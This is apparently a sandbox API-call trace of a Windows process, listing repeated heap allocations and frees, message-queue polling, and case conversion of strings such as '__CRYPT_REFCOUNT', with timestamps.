RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.074] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0176.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0176.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0176.075] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0176.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0176.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0176.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0176.076] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.076] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0176.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0176.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0176.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0176.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0176.077] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0176.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0176.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0176.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0176.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0176.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0176.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0176.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0176.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x411a020 [0176.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0176.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x411a020 | out: hHeap=0x970000) returned 1 [0176.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0176.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0176.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0176.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0176.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0176.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0176.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0176.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0176.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0176.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0176.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 